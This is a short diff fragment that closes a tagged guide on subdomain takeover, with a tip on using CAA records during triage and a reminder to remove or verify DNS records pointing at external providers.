+7. Use CAA to limit certificate issuance while you triage; it reduces the blast radius for taken-over hosts.
+</pro_tips>
+
+<remember>Subdomain safety is lifecycle safety: if DNS points at anything, you must own and verify the thing on every provider and product path. Remove or verify—there is no safe middle.</remember>
+</subdomain_takeover_guide>